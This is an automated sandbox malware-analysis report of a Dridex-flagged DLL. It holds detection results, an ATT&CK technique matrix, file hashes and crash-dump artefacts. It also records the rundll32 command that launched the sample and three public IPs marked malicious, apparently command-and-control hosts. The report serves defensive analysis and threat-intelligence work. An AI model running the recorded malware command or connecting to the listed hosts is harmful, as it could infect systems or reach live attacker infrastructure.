      Source: WerFault.exe, 0000000F.00000002.323639080.0000000005770000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: WerFault.exe, 0000000F.00000002.323639080.0000000005770000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection11LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 413038 Sample: 1c640454_by_Libranalysis Startdate: 13/05/2021 Architecture: WINDOWS Score: 72 18 162.241.209.225 UNIFIEDLAYER-AS-1US United States 2->18 20 82.209.17.209 PODA-ASCZ Czech Republic 2->20 22 43.229.206.212 INET-AS-IDPTInetGlobalIndoID Indonesia 2->22 26 Found malware configuration 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 Yara detected Dridex unpacked file 2->30 32 2 other signatures 2->32 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 cmd.exe 1 9->11         started        process6 13 rundll32.exe 11->13         started        process7 15 WerFault.exe 23 9 13->15         started        dnsIp8 24 192.168.2.1 unknown unknown 15->24

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      1c640454_by_Libranalysis.dll30%ReversingLabsWin32.Trojan.Convagent
      1c640454_by_Libranalysis.dll100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.rundll32.exe.2790000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      82.209.17.209
      unknownCzech Republic
      30764PODA-ASCZtrue
      162.241.209.225
      unknownUnited States
      46606UNIFIEDLAYER-AS-1UStrue
      43.229.206.212
      unknownIndonesia
      24532INET-AS-IDPTInetGlobalIndoIDtrue

      Private

      IP
      192.168.2.1

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:413038
      Start date:13.05.2021
      Start time:06:44:33
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 49s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:1c640454_by_Libranalysis (renamed file extension from none to dll)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:31
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.winDLL@6/4@0/4
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 57.2% (good quality ratio 49.4%)
      • Quality average: 67.2%
      • Quality standard deviation: 35.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 2
      • Number of non-executed functions: 4
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI

      Simulations

      Behavior and APIs

      TimeTypeDescription
      06:46:06API Interceptor1x Sleep call for process: WerFault.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      82.209.17.209a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
        0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
          c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
            62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                  ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                    1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                      514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                        a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                          d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                            634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                  ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                    514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                      512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                        7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                          7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                            d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                              162.241.209.225a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
                                                  c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
                                                      634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                        0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                          ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                            1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                  d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                    634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                      7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                        1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                          ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                            514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                              512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                  7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                    d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      43.229.206.212a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                        0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                          c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                            62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                  ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                    1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                        a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                          d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                            634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                  ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                    514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                      512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                        7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                          7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                            d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASN

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              PODA-ASCZa13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 82.209.17.209
                                                                                                                              INET-AS-IDPTInetGlobalIndoIDa13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 43.229.206.212
                                                                                                                              UNIFIEDLAYER-AS-1USa13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              0f6f2d53_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              c2b6efb1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              62badb64_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              0ee1d71e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              a13bac07_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              634459e1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              1bbde683_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              ce9a5575_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              514b5b51_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              512d531a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              7c4e952c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              7af9a7b0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225
                                                                                                                              d310ebba_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                              • 162.241.209.225

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_acb49c8a22c31cd0ff11e6b9dc409dfb28af4b20_82810a17_1a9d1575\Report.wer
                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12488
                                                                                                                              Entropy (8bit):3.766525558216272
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:6mi/0oXK4cHBUZMX4jed+3G/u7sZS274ItWcH:riBXKTBUZMX4jeb/u7sZX4ItWcH
                                                                                                                              MD5:191005AC8CA5507F0B32B703C0A3F667
                                                                                                                              SHA1:DDAA4851D6E68FECD6D5C8040F68D800D1574F40
                                                                                                                              SHA-256:51EE7E7184CBDA40A1BA5B97C7CF3D9F416262535489F4993840781397E71533
                                                                                                                              SHA-512:6437630263620C6344A2C81202BA985C5EEF2875E4EAB236F627F4086DE38B3CFD5C1D540D10B6D6E133B5FDBF40323A08B1029B4C62B7FEE5AEE716494C8B64
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.3.8.7.1.5.9.1.5.1.6.9.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.5.3.8.7.1.6.5.1.5.1.6.7.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.d.e.f.5.0.5.-.8.1.2.0.-.4.d.a.2.-.8.d.d.b.-.4.b.5.b.b.b.0.d.9.a.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.4.f.4.6.8.a.-.9.e.4.b.-.4.0.f.d.-.b.2.1.5.-.0.3.d.c.1.3.e.5.e.8.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.0.-.0.0.0.1.-.0.0.1.7.-.1.e.6.b.-.c.e.3.9.f.e.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7CB.tmp.dmp
                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu May 13 13:46:00 2021, 0x1205a4 type
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39238
                                                                                                                              Entropy (8bit):2.3419033316564115
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:/xFNV5aynXrK5+wLhQnRUHxTq0DW46nlk2bT0IiyxnNxS:DNV5amXrK5+4MqkQW46lky0IiQu
                                                                                                                              MD5:41B22C6920E2ED40DDCCE8404A5BB6EE
                                                                                                                              SHA1:ABD63AE5492BE47807BD3CCB7921C59BFB29C196
                                                                                                                              SHA-256:D307D9D9111FD670413403D511D3ADDBAFE4BE7C3E262E360F08D478CBB5610F
                                                                                                                              SHA-512:8B4FA9408AD4FF0BAB073E2E6FF109FC7E91F932B0B8F607FCD872D9D9C4B9E035092438F2C12D95192222093354CC621A52219D3BDE5F8DE74997AC70E6F071
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: MDMP....... ........-.`...................U...........B......x.......GenuineIntelW...........T...........t-.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD4B.tmp.WERInternalMetadata.xml
                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8292
                                                                                                                              Entropy (8bit):3.698508246109885
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:Rrl7r3GLNibt6YJ/6Y326HSgmfT0UVS3Cpr+89b8nlsf0gUm:RrlsNix6+6Ym6HSgmfT0cSI8n+fP
                                                                                                                              MD5:E6B482BAC7E9DBDF551002F4383EA0C6
                                                                                                                              SHA1:56287714EF877E2301A55C9134DFE86348D1F5B7
                                                                                                                              SHA-256:C64BFCB34F9125161D6654910D45E1BDFEF5669CA77BD21041A35AD43C74069F
                                                                                                                              SHA-512:1AE9BD42E095819A9135F575DE7E1E55D556EB010368C580406FFF8643C5221BEC58C4FA2617053B4C26EA53339653EF9A270C39703DBC0E06D000CD4810C67A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.5.6.<./.P.i.d.>.......
                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF9D.tmp.xml
                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4663
                                                                                                                              Entropy (8bit):4.474690800680671
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cvIwSD8zsStJgtWI9TDWSC8BTU8fm8M4JCdsnNrFN4+q8/iNF74SrST6d:uITfSHoySNrJxNj4BNFDWT6d
                                                                                                                              MD5:8DF8D5BAC32B2FBBBB97A5ED5E659234
                                                                                                                              SHA1:70281B56303F2F8332AEE40A581908D51344168D
                                                                                                                              SHA-256:50E1CF32E5713D27BE916A1A6699C4637AA1893FB036F17F7117F12A7A370A5D
                                                                                                                              SHA-512:E9557FEBDFB8F96D753F8AFF523DDE9CC1F151D92DF42BCA1EFC7ECC3783C11E0820EB418A3448852A19C1632210E3AABDCC40A3176651CE05D62B4118B10BED
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="987776" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):7.51388359252741
                                                                                                                              TrID:
                                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:1c640454_by_Libranalysis.dll
                                                                                                                              File size:167424
                                                                                                                              MD5:1c640454d82c630e74949cffb0d70e89
                                                                                                                              SHA1:c7603c8cbf7c41a5aea125e8030b9c37f81bf285
                                                                                                                              SHA256:610b286c27968d72cd8ecd910dbe47ec37d359d60349d2a79a0420595a14ce98
                                                                                                                              SHA512:07cee1085f0602e74afaf343f4e853b27d507e99b09048c3a43179133e77033e100c10431012cb7efdef3364836859dcbdad4eb3e871432814c81d391df0a761
                                                                                                                              SSDEEP:3072:X9F/oNrQb4xVubbXP/NTccbsFvCeLmXH57V30e8Pj:X9F6rQXvFczvYpQP
